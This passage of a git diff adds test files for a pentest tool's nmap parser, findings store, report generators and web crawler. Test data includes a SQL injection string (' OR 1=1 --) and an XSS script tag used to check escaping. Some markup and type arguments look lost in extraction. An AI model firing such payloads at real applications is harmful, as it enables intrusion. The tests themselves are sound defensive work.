+</nmaprun>`
+
+const EMPTY_NMAP_XML = `<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<nmaprun scanner="nmap" start="1700000000" version="7.94">
+<host>
+<status state="down" reason="no-response"/>
+<address addr="192.168.1.2" addrtype="ipv4"/>
+<ports></ports>
+</host>
+<runstats>
+<finished time="1700000005"/>
+</runstats>
+</nmaprun>`
+
+describe("NmapParser", () => {
+  test("parses valid nmap XML output", () => {
+    const result = NmapParser.parse(
+      SAMPLE_NMAP_XML,
+      "scan_123",
+      "session_456",
+      "192.168.1.1",
+      "nmap -sV 192.168.1.1"
+    )
+
+    expect(result.id).toBe("scan_123")
+    expect(result.sessionID).toBe("session_456")
+    expect(result.target).toBe("192.168.1.1")
+    expect(result.hosts.length).toBe(1)
+  })
+
+  test("extracts host information correctly", () => {
+    const result = NmapParser.parse(
+      SAMPLE_NMAP_XML,
+      "scan_123",
+      "session_456",
+      "192.168.1.1",
+      "nmap 192.168.1.1"
+    )
+
+    const host = result.hosts[0]
+    expect(host.address).toBe("192.168.1.1")
+    expect(host.addressType).toBe("ipv4")
+    expect(host.hostname).toBe("router.local")
+    expect(host.status).toBe("up")
+  })
+
+  test("extracts port information correctly", () => {
+    const result = NmapParser.parse(
+      SAMPLE_NMAP_XML,
+      "scan_123",
+      "session_456",
+      "192.168.1.1",
+      "nmap 192.168.1.1"
+    )
+
+    const host = result.hosts[0]
+    expect(host.ports.length).toBe(4)
+
+    const sshPort = host.ports.find((p) => p.portid === 22)
+    expect(sshPort).toBeDefined()
+    expect(sshPort!.state).toBe("open")
+    expect(sshPort!.protocol).toBe("tcp")
+    expect(sshPort!.service?.name).toBe("ssh")
+    expect(sshPort!.service?.product).toBe("OpenSSH")
+    expect(sshPort!.service?.version).toBe("8.9p1")
+  })
+
+  test("handles hosts with no open ports", () => {
+    const result = NmapParser.parse(
+      EMPTY_NMAP_XML,
+      "scan_123",
+      "session_456",
+      "192.168.1.2",
+      "nmap 192.168.1.2"
+    )
+
+    expect(result.hosts.length).toBe(1)
+    expect(result.hosts[0].status).toBe("down")
+    expect(result.hosts[0].ports.length).toBe(0)
+  })
+
+  test("extracts timing information", () => {
+    const result = NmapParser.parse(
+      SAMPLE_NMAP_XML,
+      "scan_123",
+      "session_456",
+      "192.168.1.1",
+      "nmap 192.168.1.1"
+    )
+
+    expect(result.startTime).toBe(1700000000000) // Unix timestamp * 1000
+    expect(result.endTime).toBe(1700000015000)
+  })
+
+  test("formatResult produces readable output", () => {
+    const result = NmapParser.parse(
+      SAMPLE_NMAP_XML,
+      "scan_123",
+      "session_456",
+      "192.168.1.1",
+      "nmap 192.168.1.1"
+    )
+
+    const formatted = NmapParser.formatResult(result)
+
+    expect(formatted).toContain("192.168.1.1")
+    expect(formatted).toContain("router.local")
+    expect(formatted).toContain("22/tcp")
+    expect(formatted).toContain("ssh")
+    expect(formatted).toContain("OpenSSH")
+  })
+
+  test("summarize produces concise summary", () => {
+    const result = NmapParser.parse(
+      SAMPLE_NMAP_XML,
+      "scan_123",
+      "session_456",
+      "192.168.1.1",
+      "nmap 192.168.1.1"
+    )
+
+    const summary = NmapParser.summarize(result)
+
+    expect(summary).toContain("1 host")
+    expect(summary).toContain("4 open port")
+  })
+})
+
+describe("Findings", () => {
+  beforeEach(() => {
+    Findings.clearMemory()
+  })
+
+  test("creates finding with generated id", async () => {
+    const finding = await Findings.create(
+      {
+        sessionID: "session_123",
+        title: "Test Finding",
+        description: "Test description",
+        severity: "medium",
+        status: "open",
+        target: "192.168.1.1",
+      },
+      { storage: "memory" }
+    )
+
+    expect(finding.id).toBeDefined()
+    expect(finding.id).toMatch(/^finding_/)
+    expect(finding.title).toBe("Test Finding")
+    expect(finding.createdAt).toBeDefined()
+  })
+
+  test("retrieves finding by id", async () => {
+    const created = await Findings.create(
+      {
+        sessionID: "session_123",
+        title: "Test Finding",
+        description: "Test description",
+        severity: "high",
+        status: "open",
+        target: "192.168.1.1",
+      },
+      { storage: "memory" }
+    )
+
+    const retrieved = await Findings.get(created.id, { storage: "memory" })
+
+    expect(retrieved).toBeDefined()
+    expect(retrieved!.id).toBe(created.id)
+    expect(retrieved!.title).toBe("Test Finding")
+  })
+
+  test("updates finding", async () => {
+    const created = await Findings.create(
+      {
+        sessionID: "session_123",
+        title: "Test Finding",
+        description: "Test description",
+        severity: "medium",
+        status: "open",
+        target: "192.168.1.1",
+      },
+      { storage: "memory" }
+    )
+
+    const updated = await Findings.update(
+      created.id,
+      { status: "confirmed", severity: "high" },
+      { storage: "memory" }
+    )
+
+    expect(updated).toBeDefined()
+    expect(updated!.status).toBe("confirmed")
+    expect(updated!.severity).toBe("high")
+    expect(updated!.updatedAt).toBeDefined()
+  })
+
+  test("lists findings with filters", async () => {
+    await Findings.create(
+      {
+        sessionID: "session_1",
+        title: "Finding 1",
+        description: "Description 1",
+        severity: "high",
+        status: "open",
+        target: "192.168.1.1",
+      },
+      { storage: "memory" }
+    )
+
+    await Findings.create(
+      {
+        sessionID: "session_1",
+        title: "Finding 2",
+        description: "Description 2",
+        severity: "medium",
+        status: "open",
+        target: "192.168.1.2",
+      },
+      { storage: "memory" }
+    )
+
+    await Findings.create(
+      {
+        sessionID: "session_2",
+        title: "Finding 3",
+        description: "Description 3",
+        severity: "high",
+        status: "confirmed",
+        target: "192.168.1.1",
+      },
+      { storage: "memory" }
+    )
+
+    // Filter by session
+    const session1Findings = await Findings.list({ storage: "memory" }, { sessionID: "session_1" })
+    expect(session1Findings.length).toBe(2)
+
+    // Filter by severity
+    const highFindings = await Findings.list({ storage: "memory" }, { severity: "high" })
+    expect(highFindings.length).toBe(2)
+
+    // Filter by status
+    const openFindings = await Findings.list({ storage: "memory" }, { status: "open" })
+    expect(openFindings.length).toBe(2)
+
+    // Filter by target
+    const targetFindings = await Findings.list({ storage: "memory" }, { target: "192.168.1.1" })
+    expect(targetFindings.length).toBe(2)
+  })
+
+  test("removes finding", async () => {
+    const created = await Findings.create(
+      {
+        sessionID: "session_123",
+        title: "Test Finding",
+        description: "Test description",
+        severity: "low",
+        status: "open",
+        target: "192.168.1.1",
+      },
+      { storage: "memory" }
+    )
+
+    const removed = await Findings.remove(created.id, { storage: "memory" })
+    expect(removed).toBe(true)
+
+    const retrieved = await Findings.get(created.id, { storage: "memory" })
+    expect(retrieved).toBeNull()
+  })
+
+  test("saves and retrieves scan results", async () => {
+    const scan: PentestTypes.ScanResult = {
+      id: "scan_123",
+      sessionID: "session_456",
+      scanType: "port",
+      target: "192.168.1.1",
+      command: "nmap 192.168.1.1",
+      startTime: Date.now(),
+      hosts: [
+        {
+          address: "192.168.1.1",
+          addressType: "ipv4",
+          status: "up",
+          ports: [
+            {
+              protocol: "tcp",
+              portid: 22,
+              state: "open",
+              service: { name: "ssh" },
+            },
+          ],
+        },
+      ],
+    }
+
+    await Findings.saveScan(scan, { storage: "memory" })
+
+    const retrieved = await Findings.getScan("scan_123", { storage: "memory" })
+    expect(retrieved).toBeDefined()
+    expect(retrieved!.target).toBe("192.168.1.1")
+    expect(retrieved!.hosts.length).toBe(1)
+  })
+
+  test("analyzes scan and creates findings", async () => {
+    const scan: PentestTypes.ScanResult = {
+      id: "scan_analysis",
+      sessionID: "session_analysis",
+      scanType: "port",
+      target: "192.168.1.1",
+      command: "nmap 192.168.1.1",
+      startTime: Date.now(),
+      hosts: [
+        {
+          address: "192.168.1.1",
+          addressType: "ipv4",
+          status: "up",
+          ports: [
+            {
+              protocol: "tcp",
+              portid: 22,
+              state: "open",
+              service: { name: "ssh" },
+            },
+            {
+              protocol: "tcp",
+              portid: 23,
+              state: "open",
+              service: { name: "telnet" },
+            },
+            {
+              protocol: "tcp",
+              portid: 80,
+              state: "open",
+              service: { name: "http" },
+            },
+          ],
+        },
+      ],
+    }
+
+    const findings = await Findings.analyzeAndCreateFindings(scan, { storage: "memory" })
+
+    expect(findings.length).toBeGreaterThan(0)
+
+    // Should have high severity for telnet
+    const telnetFinding = findings.find((f) => f.service === "telnet")
+    expect(telnetFinding).toBeDefined()
+    expect(telnetFinding!.severity).toBe("high")
+
+    // Should have info severity for ssh
+    const sshFinding = findings.find((f) => f.service === "ssh")
+    expect(sshFinding).toBeDefined()
+    expect(sshFinding!.severity).toBe("info")
+  })
+
+  test("memoryCount returns correct counts", async () => {
+    await Findings.create(
+      {
+        sessionID: "session_123",
+        title: "Test Finding",
+        description: "Test description",
+        severity: "low",
+        status: "open",
+        target: "192.168.1.1",
+      },
+      { storage: "memory" }
+    )
+
+    await Findings.saveScan(
+      {
+        id: "scan_123",
+        sessionID: "session_456",
+        scanType: "port",
+        target: "192.168.1.1",
+        command: "nmap 192.168.1.1",
+        startTime: Date.now(),
+        hosts: [],
+      },
+      { storage: "memory" }
+    )
+
+    const counts = Findings.memoryCount()
+    expect(counts.findings).toBe(1)
+    expect(counts.scans).toBe(1)
+  })
+
+  test("clearMemory clears all buffers", async () => {
+    await Findings.create(
+      {
+        sessionID: "session_123",
+        title: "Test Finding",
+        description: "Test description",
+        severity: "low",
+        status: "open",
+        target: "192.168.1.1",
+      },
+      { storage: "memory" }
+    )
+
+    Findings.clearMemory()
+
+    const counts = Findings.memoryCount()
+    expect(counts.findings).toBe(0)
+    expect(counts.scans).toBe(0)
+  })
+})
+
+describe("PentestTypes", () => {
+  test("validates Severity enum", () => {
+    expect(PentestTypes.Severity.parse("critical")).toBe("critical")
+    expect(PentestTypes.Severity.parse("high")).toBe("high")
+    expect(PentestTypes.Severity.parse("medium")).toBe("medium")
+    expect(PentestTypes.Severity.parse("low")).toBe("low")
+    expect(PentestTypes.Severity.parse("info")).toBe("info")
+    expect(() => PentestTypes.Severity.parse("invalid")).toThrow()
+  })
+
+  test("validates PortState enum", () => {
+    expect(PentestTypes.PortState.parse("open")).toBe("open")
+    expect(PentestTypes.PortState.parse("closed")).toBe("closed")
+    expect(PentestTypes.PortState.parse("filtered")).toBe("filtered")
+    expect(() => PentestTypes.PortState.parse("invalid")).toThrow()
+  })
+
+  test("validates Finding schema", () => {
+    const validFinding = {
+      id: "finding_123",
+      sessionID: "session_456",
+      title: "Test Finding",
+      description: "Test description",
+      severity: "high",
+      status: "open",
+      target: "192.168.1.1",
+      port: 22,
+      protocol: "tcp",
+      createdAt: Date.now(),
+    }
+
+    const parsed = PentestTypes.Finding.parse(validFinding)
+    expect(parsed.id).toBe("finding_123")
+    expect(parsed.severity).toBe("high")
+  })
+
+  test("validates Host schema", () => {
+    const validHost = {
+      address: "192.168.1.1",
+      addressType: "ipv4",
+      status: "up",
+      ports: [
+        {
+          protocol: "tcp",
+          portid: 22,
+          state: "open",
+        },
+      ],
+    }
+
+    const parsed = PentestTypes.Host.parse(validHost)
+    expect(parsed.address).toBe("192.168.1.1")
+    expect(parsed.ports.length).toBe(1)
+  })
+
+  test("validates ScanResult schema", () => {
+    const validScan = {
+      id: "scan_123",
+      sessionID: "session_456",
+      scanType: "port",
+      target: "192.168.1.1",
+      command: "nmap 192.168.1.1",
+      startTime: Date.now(),
+      hosts: [],
+    }
+
+    const parsed = PentestTypes.ScanResult.parse(validScan)
+    expect(parsed.id).toBe("scan_123")
+    expect(parsed.scanType).toBe("port")
+  })
+})
diff --git a/packages/opencode/test/pentest/reports.test.ts b/packages/opencode/test/pentest/reports.test.ts
new file mode 100644
index 00000000000..6df9bb14104
--- /dev/null
+++ b/packages/opencode/test/pentest/reports.test.ts
@@ -0,0 +1,457 @@
+/**
+ * @fileoverview Report Generator Tests
+ *
+ * Tests for security assessment report generation.
+ */
+
+import { describe, test, expect } from "bun:test"
+import { generateMarkdownReport } from "../../src/pentest/reports/markdown"
+import { generateHtmlReport } from "../../src/pentest/reports/html"
+import type { ReportData, ReportConfig, SeverityStats, StatusStats } from "../../src/pentest/reports/types"
+import type { PentestTypes } from "../../src/pentest/types"
+
+// Helper to create test findings
+function createFinding(overrides: Partial<PentestTypes.Finding> = {}): PentestTypes.Finding {
+  return {
+    id: `finding_${Math.random().toString(36).slice(2)}`,
+    sessionID: "session_test",
+    scanID: "scan_test",
+    title: "Test Finding",
+    description: "Test description",
+    severity: "medium",
+    status: "open",
+    target: "192.168.1.1",
+    port: 80,
+    protocol: "tcp",
+    service: "http",
+    createdAt: Date.now(),
+    ...overrides,
+  }
+}
+
+// Helper to create test report data
+function createReportData(overrides: Partial<ReportData> = {}): ReportData {
+  const findings = overrides.findings || [
+    createFinding({ severity: "critical", title: "Critical SQL Injection" }),
+    createFinding({ severity: "high", title: "XSS Vulnerability" }),
+    createFinding({ severity: "medium", title: "Insecure Headers" }),
+    createFinding({ severity: "low", title: "Information Disclosure" }),
+    createFinding({ severity: "info", title: "Server Version Detected" }),
+  ]
+
+  const severityStats: SeverityStats = {
+    critical: findings.filter(f => f.severity === "critical").length,
+    high: findings.filter(f => f.severity === "high").length,
+    medium: findings.filter(f => f.severity === "medium").length,
+    low: findings.filter(f => f.severity === "low").length,
+    info: findings.filter(f => f.severity === "info").length,
+    total: findings.length,
+  }
+
+  const statusStats: StatusStats = {
+    open: findings.filter(f => f.status === "open").length,
+    confirmed: findings.filter(f => f.status === "confirmed").length,
+    mitigated: findings.filter(f => f.status === "mitigated").length,
+    false_positive: findings.filter(f => f.status === "false_positive").length,
+  }
+
+  const config: ReportConfig = {
+    title: "Security Assessment Report",
+    type: "technical",
+    format: "markdown",
+    includeRawData: false,
+    includeRemediation: true,
+    includeExecutiveSummary: true,
+    includeMethodology: true,
+    includeCharts: true,
+    ...overrides.config,
+  }
+
+  return {
+    config,
+    findings,
+    severityStats,
+    statusStats,
+    generatedAt: Date.now(),
+    reportId: "report_test_123",
+    ...overrides,
+  }
+}
+
+describe("Markdown Report Generator", () => {
+  test("generates report with all sections", () => {
+    const data = createReportData()
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("# Security Assessment Report")
+    expect(markdown).toContain("## Executive Summary")
+    expect(markdown).toContain("## Methodology")
+    expect(markdown).toContain("## Findings Summary")
+    expect(markdown).toContain("## Detailed Findings")
+    expect(markdown).toContain("## Remediation Summary")
+  })
+
+  test("includes severity statistics", () => {
+    const data = createReportData()
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("| Critical | 1 |")
+    expect(markdown).toContain("| High | 1 |")
+    expect(markdown).toContain("| Medium | 1 |")
+    expect(markdown).toContain("| Low | 1 |")
+    expect(markdown).toContain("| Info | 1 |")
+  })
+
+  test("groups findings by severity", () => {
+    const data = createReportData()
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("### CRITICAL Severity Findings")
+    expect(markdown).toContain("### HIGH Severity Findings")
+    expect(markdown).toContain("### MEDIUM Severity Findings")
+    expect(markdown).toContain("### LOW Severity Findings")
+    expect(markdown).toContain("### INFO Severity Findings")
+  })
+
+  test("includes finding details", () => {
+    const data = createReportData({
+      findings: [
+        createFinding({
+          title: "SQL Injection in Login",
+          description: "The login form is vulnerable to SQL injection",
+          evidence: "' OR 1=1 --",
+          remediation: "Use parameterized queries",
+          cve: ["CVE-2021-12345"],
+          severity: "critical",
+        }),
+      ],
+    })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("SQL Injection in Login")
+    expect(markdown).toContain("vulnerable to SQL injection")
+    expect(markdown).toContain("' OR 1=1 --")
+    expect(markdown).toContain("parameterized queries")
+    expect(markdown).toContain("CVE-2021-12345")
+  })
+
+  test("includes organization info", () => {
+    const data = createReportData({
+      config: {
+        title: "Security Assessment",
+        type: "technical",
+        format: "markdown",
+        organization: "Acme Corp",
+        assessor: "Security Team",
+        includeRawData: false,
+        includeRemediation: true,
+        includeExecutiveSummary: true,
+        includeMethodology: true,
+        includeCharts: true,
+      },
+    })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("**Client:** Acme Corp")
+    expect(markdown).toContain("**Assessor:** Security Team")
+  })
+
+  test("includes scope section when provided", () => {
+    const data = createReportData({
+      config: {
+        title: "Test Report",
+        type: "technical",
+        format: "markdown",
+        includeRawData: false,
+        includeRemediation: true,
+        includeExecutiveSummary: true,
+        includeMethodology: true,
+        includeCharts: true,
+        scope: {
+          targets: ["192.168.1.0/24", "example.com"],
+          description: "Internal network assessment",
+          exclusions: ["192.168.1.1"],
+        },
+      },
+    })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("## Scope")
+    expect(markdown).toContain("192.168.1.0/24")
+    expect(markdown).toContain("example.com")
+    expect(markdown).toContain("### Exclusions")
+  })
+
+  test("respects includeExecutiveSummary flag", () => {
+    const data = createReportData({
+      config: {
+        title: "Test",
+        type: "technical",
+        format: "markdown",
+        includeExecutiveSummary: false,
+        includeRawData: false,
+        includeRemediation: true,
+        includeMethodology: true,
+        includeCharts: true,
+      },
+    })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).not.toContain("## Executive Summary")
+  })
+
+  test("respects includeMethodology flag", () => {
+    const data = createReportData({
+      config: {
+        title: "Test",
+        type: "technical",
+        format: "markdown",
+        includeMethodology: false,
+        includeRawData: false,
+        includeRemediation: true,
+        includeExecutiveSummary: true,
+        includeCharts: true,
+      },
+    })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).not.toContain("## Methodology")
+  })
+
+  test("handles empty findings", () => {
+    const data = createReportData({ findings: [] })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("*No findings to report.*")
+  })
+
+  test("determines correct risk level", () => {
+    // Critical findings -> CRITICAL risk
+    const critical = createReportData({
+      findings: [createFinding({ severity: "critical" })],
+    })
+    expect(generateMarkdownReport(critical)).toContain("**CRITICAL**")
+
+    // High findings only -> HIGH risk
+    const high = createReportData({
+      findings: [createFinding({ severity: "high" })],
+    })
+    expect(generateMarkdownReport(high)).toContain("**HIGH**")
+
+    // Medium findings only -> MEDIUM risk
+    const medium = createReportData({
+      findings: [createFinding({ severity: "medium" })],
+    })
+    expect(generateMarkdownReport(medium)).toContain("**MEDIUM**")
+
+    // Low findings only -> LOW risk
+    const low = createReportData({
+      findings: [createFinding({ severity: "low" })],
+    })
+    expect(generateMarkdownReport(low)).toContain("**LOW**")
+
+    // Info findings only -> INFORMATIONAL risk
+    const info = createReportData({
+      findings: [createFinding({ severity: "info" })],
+    })
+    expect(generateMarkdownReport(info)).toContain("**INFORMATIONAL**")
+  })
+
+  test("includes footer with report ID", () => {
+    const data = createReportData({ reportId: "report_abc123" })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("report_abc123")
+    expect(markdown).toContain("cyxwiz Security Assessment Platform")
+  })
+})
+
+describe("HTML Report Generator", () => {
+  test("generates valid HTML structure", () => {
+    const data = createReportData()
+    const html = generateHtmlReport(data)
+
+    expect(html).toContain("<!DOCTYPE html>")
+    expect(html).toContain("<html")
+    expect(html).toContain("<head>")
+    expect(html).toContain("<body>")
+    expect(html).toContain("</html>")
+  })
+
+  test("includes CSS styles", () => {
+    const data = createReportData()
+    const html = generateHtmlReport(data)
+
+    expect(html).toContain("<style>")
+    expect(html).toContain("</style>")
+    expect(html).toContain("font-family")
+  })
+
+  test("includes severity badges", () => {
+    const data = createReportData()
+    const html = generateHtmlReport(data)
+
+    // CSS class definitions
+    expect(html).toContain(".severity-badge.critical")
+    expect(html).toContain(".severity-badge.high")
+    expect(html).toContain(".severity-badge.medium")
+    expect(html).toContain(".severity-badge.low")
+    expect(html).toContain(".severity-badge.info")
+  })
+
+  test("includes statistics section", () => {
+    const data = createReportData()
+    const html = generateHtmlReport(data)
+
+    expect(html).toContain("stat-card")
+    expect(html).toContain("stat-number")
+  })
+
+  test("includes findings table", () => {
+    const data = createReportData()
+    const html = generateHtmlReport(data)
+
+    expect(html).toContain("<table")
+    expect(html).toContain("<thead>")
+    expect(html).toContain("<tbody>")
+    expect(html).toContain("</table>")
+  })
+
+  test("respects custom CSS", () => {
+    const data = createReportData({
+      config: {
+        title: "Test",
+        type: "technical",
+        format: "html",
+        customCss: ".custom-class { color: red; }",
+        includeRawData: false,
+        includeRemediation: true,
+        includeExecutiveSummary: true,
+        includeMethodology: true,
+        includeCharts: true,
+      },
+    })
+    const html = generateHtmlReport(data)
+
+    expect(html).toContain(".custom-class { color: red; }")
+  })
+
+  test("includes print styles", () => {
+    const data = createReportData()
+    const html = generateHtmlReport(data)
+
+    expect(html).toContain("@media print")
+  })
+
+  test("escapes HTML in finding content", () => {
+    const data = createReportData({
+      findings: [
+        createFinding({
+          title: "XSS <script>alert('test')</script>",
+          description: "Contains <script> tags",
+        }),
+      ],
+    })
+    const html = generateHtmlReport(data)
+
+    // Should escape script tags
+    expect(html).not.toContain("<script>alert")
+    expect(html).toContain("<script>")
+  })
+
+  test("includes chart container when enabled", () => {
+    const data = createReportData({
+      config: {
+        title: "Test",
+        type: "technical",
+        format: "html",
+        includeCharts: true,
+        includeRawData: false,
+        includeRemediation: true,
+        includeExecutiveSummary: true,
+        includeMethodology: true,
+      },
+    })
+    const html = generateHtmlReport(data)
+
+    expect(html).toContain("chart-container")
+  })
+})
+
+describe("Report Types", () => {
+  test("executive report focuses on critical/high", () => {
+    const data = createReportData({
+      config: {
+        title: "Executive Summary",
+        type: "executive",
+        format: "markdown",
+        includeRawData: false,
+        includeRemediation: true,
+        includeExecutiveSummary: true,
+        includeMethodology: false,
+        includeCharts: false,
+      },
+    })
+    const markdown = generateMarkdownReport(data)
+
+    // Executive reports should still include summary
+    expect(markdown).toContain("Executive Summary")
+    // But not methodology
+    expect(markdown).not.toContain("## Methodology")
+  })
+
+  test("technical report includes all details", () => {
+    const data = createReportData({
+      config: {
+        title: "Technical Report",
+        type: "technical",
+        format: "markdown",
+        includeRawData: false,
+        includeRemediation: true,
+        includeExecutiveSummary: true,
+        includeMethodology: true,
+        includeCharts: true,
+      },
+    })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("## Executive Summary")
+    expect(markdown).toContain("## Methodology")
+    expect(markdown).toContain("## Detailed Findings")
+    expect(markdown).toContain("## Remediation Summary")
+  })
+})
+
+describe("Remediation Summary", () => {
+  test("groups by priority", () => {
+    const data = createReportData({
+      findings: [
+        createFinding({ severity: "critical", remediation: "Fix critical issue" }),
+        createFinding({ severity: "high", remediation: "Fix high issue" }),
+        createFinding({ severity: "medium", remediation: "Fix medium issue" }),
+        createFinding({ severity: "low", remediation: "Fix low issue" }),
+      ],
+    })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("### Immediate Action Required")
+    expect(markdown).toContain("### Short-Term Remediation")
+    expect(markdown).toContain("### Long-Term Improvements")
+  })
+
+  test("includes remediation text for each finding", () => {
+    const data = createReportData({
+      findings: [
+        createFinding({
+          severity: "critical",
+          title: "SQL Injection",
+          remediation: "Use parameterized queries",
+        }),
+      ],
+    })
+    const markdown = generateMarkdownReport(data)
+
+    expect(markdown).toContain("SQL Injection")
+    expect(markdown).toContain("parameterized queries")
+  })
+})
diff --git a/packages/opencode/test/pentest/webscan.test.ts b/packages/opencode/test/pentest/webscan.test.ts
new file mode 100644
index 00000000000..fbb74dd6a97
--- /dev/null
+++ b/packages/opencode/test/pentest/webscan.test.ts
@@ -0,0 +1,644 @@
+/**
+ * @fileoverview Web Scanner Tests
+ *
+ * Tests for web crawling, scanning, parsing, and OWASP categorization.
+ */
+
+import { describe, test, expect, beforeEach, afterEach } from "bun:test"
+import {
+  WebScanTypes,
+  WebCrawler,
+  ScanProfiles,
+  WebScanStorage,
+  OwaspCategorization,
+  WPScanParser,
+  WhatWebParser,
+} from "../../src/pentest/webscan"
+import { PentestTypes } from "../../src/pentest/types"
+
+describe("WebCrawler", () => {
+  describe("extractLinks", () => {
+    test("extracts href links from HTML", () => {
+      const html = `
+        <html>
+          <a href="/page1">Page 1</a>
+          <a href="/page2">Page 2</a>
+          <a href="https://other.com/external">External</a>
+        </html>
+      `
+      const links = WebCrawler.extractLinks(html, "http://example.com")
+
+      expect(links).toContain("http://example.com/page1")
+      expect(links).toContain("http://example.com/page2")
+      // External links should be filtered out
+      expect(links).not.toContain("https://other.com/external")
+    })
+
+    test("handles relative URLs", () => {
+      const html = `<a href="subdir/page.html">Link</a>`
+      const links = WebCrawler.extractLinks(html, "http://example.com/dir/")
+
+      expect(links).toContain("http://example.com/dir/subdir/page.html")
+    })
+
+    test("skips javascript and mailto links", () => {
+      const html = `
+        <a href="javascript:void(0)">JS</a>
+        <a href="mailto:test@example.com">Email</a>
+        <a href="/valid">Valid</a>
+      `
+      const links = WebCrawler.extractLinks(html, "http://example.com")
+
+      expect(links).toHaveLength(1)
+      expect(links[0]).toBe("http://example.com/valid")
+    })
+  })
+
+  describe("extractForms", () => {
+    test("extracts form with inputs", () => {
+      const html = `
+        <form action="/login" method="POST">
+          <input type="text" name="username" required>
+          <input type="password" name="password">
+          <input type="submit" value="Login">
+        </form>
+      `
+      const forms = WebCrawler.extractForms(html, "http://example.com")
+
+      expect(forms).toHaveLength(1)
+      expect(forms[0].action).toBe("http://example.com/login")
+      expect(forms[0].method).toBe("POST")
+      expect(forms[0].hasPassword).toBe(true)
+      expect(forms[0].inputs).toHaveLength(2) // submit button has no name, so excluded
+    })
+
+    test("detects file upload forms", () => {
+      const html = `
+        <form action="/upload" method="POST" enctype="multipart/form-data">
+          <input type="file" name="document">
+          <input type="submit" value="Upload">
+        </form>
+      `
+      const forms = WebCrawler.extractForms(html, "http://example.com")
+
+      expect(forms[0].hasFileUpload).toBe(true)
+    })
+
+    test("handles textarea and select", () => {
+      const html = `
+        <form action="/submit">
+          <textarea name="message">

+ + + ` + const forms = WebCrawler.extractForms(html, "http://example.com") + + expect(forms[0].inputs.some((i) => i.name === "message" && i.type === "textarea")).toBe(true) + expect(forms[0].inputs.some((i) => i.name === "category" && i.type === "select")).toBe(true) + }) + }) +}) + +describe("ScanProfiles", () => { + test("has all required profiles", () => { + expect(ScanProfiles.all).toHaveLength(5) + expect(ScanProfiles.get("quick")).toBeDefined() + expect(ScanProfiles.get("standard")).toBeDefined() + expect(ScanProfiles.get("thorough")).toBeDefined() + expect(ScanProfiles.get("passive")).toBeDefined() + expect(ScanProfiles.get("custom")).toBeDefined() + }) + + test("quick profile has correct configuration", () => { + const quick = ScanProfiles.get("quick") + + expect(quick.crawl.enabled).toBe(true) + expect(quick.crawl.maxDepth).toBe(1) + expect(quick.crawl.maxUrls).toBe(50) + expect(quick.tools).toContain("whatweb") + expect(quick.tools).toContain("nikto") + }) + + test("passive profile disables crawling", () => { + const passive = ScanProfiles.get("passive") + + expect(passive.crawl.enabled).toBe(false) + expect(passive.tools).toContain("whatweb") + expect(passive.tools).toContain("wafw00f") + }) + + test("createCustom merges options", () => { + const custom = ScanProfiles.createCustom({ + crawl: { maxDepth: 5 }, + tools: ["nikto", "nuclei"], + }) + + expect(custom.id).toBe("custom") + expect(custom.crawl.maxDepth).toBe(5) + expect(custom.crawl.enabled).toBe(true) // From default + expect(custom.tools).toEqual(["nikto", "nuclei"]) + }) + + test("list returns formatted string", () => { + const list = ScanProfiles.list() + + expect(list).toContain("quick") + expect(list).toContain("standard") + expect(list).toContain("thorough") + expect(list).toContain("passive") + }) +}) + +describe("WebScanStorage", () => { + beforeEach(() => { + WebScanStorage.clearMemory() + }) + + afterEach(() => { + WebScanStorage.clearMemory() + }) + + describe("crawl operations", () => { + test("saves and retrieves crawl", async () => { + const crawl: Omit = { + target: "http://example.com", + urls: [ + { + url: "http://example.com/", + method: "GET", + statusCode: 200, + depth: 0, + discoveredAt: Date.now(), + }, + ], + forms: [], + stats: { + urlsDiscovered: 1, + urlsVisited: 1, + formsDiscovered: 0, + maxDepthReached: 0, + errorCount: 0, + duration: 1000, + }, + options: { maxDepth: 2, maxUrls: 100 } as WebScanTypes.CrawlOptions, + startedAt: Date.now(), + completedAt: Date.now(), + status: "completed", + } + + const saved = await WebScanStorage.saveCrawl(crawl, { storage: "memory" }) + expect(saved.id).toMatch(/^crawl_/) + + const retrieved = await WebScanStorage.getCrawl(saved.id, { storage: "memory" }) + expect(retrieved).not.toBeNull() + expect(retrieved!.target).toBe("http://example.com") + }) + + test("lists crawls with filters", async () => { + const crawl1: Omit = { + target: "http://example1.com", + urls: [], + forms: [], + stats: { + urlsDiscovered: 0, + urlsVisited: 0, + formsDiscovered: 0, + maxDepthReached: 0, + errorCount: 0, + duration: 0, + }, + options: {} as WebScanTypes.CrawlOptions, + startedAt: Date.now(), + status: "completed", + } + + const crawl2: Omit = { + target: "http://example2.com", + urls: [], + forms: [], + stats: { + urlsDiscovered: 0, + urlsVisited: 0, + formsDiscovered: 0, + maxDepthReached: 0, + errorCount: 0, + duration: 0, + }, + options: {} as WebScanTypes.CrawlOptions, + startedAt: Date.now() + 1000, + status: "failed", + } + + await WebScanStorage.saveCrawl(crawl1, { storage: "memory" }) + await WebScanStorage.saveCrawl(crawl2, { storage: "memory" }) + + const all = await WebScanStorage.listCrawls({ storage: "memory" }) + expect(all).toHaveLength(2) + + const completed = await WebScanStorage.listCrawls({ storage: "memory" }, { status: "completed" }) + expect(completed).toHaveLength(1) + expect(completed[0].target).toBe("http://example1.com") + }) + + test("deletes crawl", async () => { + const crawl: Omit = { + target: "http://example.com", + urls: [], + forms: [], + stats: { + urlsDiscovered: 0, + urlsVisited: 0, + formsDiscovered: 0, + maxDepthReached: 0, + errorCount: 0, + duration: 0, + }, + options: {} as WebScanTypes.CrawlOptions, + startedAt: Date.now(), + status: "completed", + } + + const saved = await WebScanStorage.saveCrawl(crawl, { storage: "memory" }) + const deleted = await WebScanStorage.deleteCrawl(saved.id, { storage: "memory" }) + expect(deleted).toBe(true) + + const retrieved = await WebScanStorage.getCrawl(saved.id, { storage: "memory" }) + expect(retrieved).toBeNull() + }) + }) + + describe("scan operations", () => { + test("saves and retrieves 